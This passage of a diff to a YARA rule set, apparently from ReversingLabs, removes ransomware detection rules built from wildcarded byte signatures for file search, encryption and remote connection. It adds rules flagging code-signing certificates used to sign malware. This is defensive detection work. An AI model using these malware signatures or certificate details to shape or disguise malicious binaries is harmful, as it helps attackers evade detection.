-            C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
-            ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B
-            C3 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
-            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3
-            A5 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 66 A5 6A ?? 59 BE ?? ?? ?? ?? 8D
-            BD ?? ?? ?? ?? F3 A5 66 A5 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 50 E8 ?? ??
-            ?? ?? 59 8B F0 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ??
-            ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ??
-            59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? FF 75 ??
-            8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 75 ?? E9 ?? ?? ?? ?? FF 75 ?? E9 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 66 39 1F 0F 84
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "7d:f6:fa:58:0f:84:49:3c:41:4e:e0:e4:31:08:67:37" and 1477440000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Badblock : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_309D2E115F1Fe2993Ee2E063 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BadBlock ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a5afb7d6-4bc1-5465-a35d-fe40e7f11c3e"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "7182f3f2-7b2a-5c29-b7a9-607feafbe570"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BadBlock.yara#L1-L100"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "421e6a3772eeec6ef0cbb2427b7e044b450a2b2146cee2ca7d8c3a3a92918557"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15480-L15496"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "15fdb95fe5429cdc0263615c2b7c90d21f37b52954c5ce568c1293cd3a544730"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BadBlock"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 5D ?? 89 5D ?? 89 4D ?? 89 55 ?? 8B D8
-            8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ??
-            8B 40 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 55
-            ?? 8B 45 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45
-            ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 6A ?? 50 52
-            8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50
-            E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20
-            6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 89 45 ?? 89 55 ?? E9 ?? ??
-            ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? EB ?? 7D ?? 8B 45 ?? 89 45 ?? 8B
-            45 ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B D8 8B C3
-            E8 ?? ?? ?? ?? 8B F0 8B D6 8B CB 8B 45 ?? 8B 38 FF 57 ?? 89 45 ?? 8B 45 ?? 8B 10 FF
-            12 52 50 8B 45 ?? E8 ?? ?? ?? ?? 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 72 ?? EB ?? 5A 58
-            7C ?? 8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ??
-            8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 52 50 8B C3 99 29 04 24 19 54 24 ?? 58 5A 52 50 8B 45 ?? E8 ?? ?? ?? ??
-            8B D6 8B 4D ?? 8B 45 ?? 8B 38 FF 57 ?? 8B C3 99 29 45 ?? 19 55 ?? 8B D3 8B C6 E8 ??
-            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ?? EB ?? 0F 8F ?? ?? ?? ?? A1
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
-            48 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 8B 00 8B 80 ??
-            ?? ?? ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 18 FF 53 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33
-            C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-            ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
-            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ??
-            EB ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$search_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
-            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 55 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
-            55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 94 C3 E9 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 66 83 38 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 75 ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0D ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66
-            83 38 ?? 74 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            75 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 94 C3 84 DB 0F 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 8B D8 4B 85 DB 7C ??
-            43 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C6 8B 38 FF
-            57 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 4B 75 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59
-            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection = {
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ??
-            8D 4D ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 08 FF
-            51 ?? 8B 45 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 6A ?? 8D 45 ?? 50 8D 4D ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
-            8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4D ??
-            8B 45 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            74 ?? C7 45 ?? ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 83 EB ?? 8B 1B 68 ?? ?? ?? ?? 8B CB
-            BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8D 45
-            ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 45
-            ?? 8B 90 ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 8B CE BA ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59
-            59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "30:9d:2e:11:5f:1f:e2:99:3e:e2:e0:63" and 1467102525 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_90E33C1068F54913315B6Ce9311141B9 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "61c5d5ed-ca2c-5f71-893b-4c933b37fa27"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15498-L15516"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4a97171c6dfaa8d249ab0be1ce264b596d266ff4697d869a4d1f90cc0e2c49b7"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files and $encrypt_files and $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GERMES, OOO" and ( pe.signatures [ i ] . serial == "00:90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" or pe.signatures [ i ] . serial == "90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" ) and 1487635200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Retmydata : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3F15C3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RetMyData ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7a091d9-7ace-5aad-95b4-d5101fa7fdea"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "10bee456-21c0-51a0-988b-43daf65e596b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.RetMyData.yara#L1-L79"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "54ce38d75e9ab82a77b9c338f75e180e19ac745f149289c7478a4aa3b44d70fd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15518-L15534"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "03ea946fa99ed7a6ab23cb26dbf514b6c062d63371c9e2a5ddf999acd1954955"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RetMyData"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 9D ?? ?? ?? ?? 8B 04 04
-            C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 40 51 51 0F 84 ?? ?? ?? ?? 8D
-            B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85
-            C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ??
-            ?? ?? 89 74 24 ?? 89 7C 24 ?? 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ??
-            89 D8 E8 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 89 D8 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 D8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44
-            24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 0F 85 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F 5D C3 55 BA ?? ?? ?? ?? 89
-            E5 53 51 89 C3 E8 ?? ?? ?? ?? 48 74 ?? 5A 89 D8 5B 5D E9 ?? ?? ?? ?? 58 5B 5D C3
-        }
-		$enum_resources = {
-            55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 95 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 8B 04 04 C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ??
-            83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 31 F6 89
-            44 24 ?? 8D 85 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 83 EC ?? 3B B5 ?? ?? ?? ?? 7D ?? 83 7B ?? ?? 75 ?? 8B 43 ?? C7 44 24 ?? ??
-            ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F8 E8 ?? ?? ?? ?? 89 D8 46 83 C3 ??
-            E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F
-            5D C3
-        }
-		$encrypt_files = {
-            55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            C0 89 C2 A3 ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31
-            C0 89 D7 F3 AB 85 DB 75 ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 5C 24 ?? 8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 3C
-            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C
-            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34
-            24 E8 ?? ?? ?? ?? 89 74 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 EC
-            ?? 83 F8 ?? 89 C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 89 7C 24 ?? 89 34 24 EB ?? 8D
-            BD ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 89
-            1C 24 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? EB ?? F7 D8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ??
-            89 1C 24 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 EC ?? BA ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            74 24 ?? 89 1C 24 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 EC ??
-            FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Certified Software" and pe.signatures [ i ] . serial == "3f:15:c3" and 1110577130 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_285Eccbd1D0000E640B84307Ef88Cd9F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4dc1523f-edc8-52e2-99aa-7389c0eb5e54"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15536-L15552"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "267df1c327b65938b2b82a53ec8345290659560c69c9a70f2866fe7bd73513a7"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DRAGON BUSINESS EQUIPMENT LIMITED" and pe.signatures [ i ] . serial == "28:5e:cc:bd:1d:00:00:e6:40:b8:43:07:ef:88:cd:9f" and 1611619200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Archiveus : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_55Ab71A3F9Dde3Ef20C788Dd1D5Ff6C3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Archiveus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "89e5af93-1153-5367-a539-6af77c99c214"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "c8b5b632-26e6-5a78-99be-b50b1240dbec"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Archiveus.yara#L3-L50"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2b8a42b98ab3e8b97d2e226e979f342a6a72f21d8f068f59c21ad95764077f8a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15554-L15570"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4bee740eaf359462cd85c6232160c6b1fc3df67acfe731da9978f0b8a304a93f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Archiveus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$entry_point = {
-            68 ?? ?? 40 00 E8 ?? ?? ?? FF
-        }
-		$dump_instruction = {
-            8B 3D ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ??
-            50 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D7 FF 15 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 1D ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 50 51 FF D3 50 8D 55 ?? 8D
-            45 ?? 52 50 FF D3 50 FF 15
-        }
-		$extension_rule = {
-            8B 13 6A ?? 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? D9 85 ?? ?? ?? ?? DB 85 ?? ?? ??
-            ?? DD 9D ?? ?? ?? ?? DC 8D ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? DC 05 ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 89 45
-            ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF
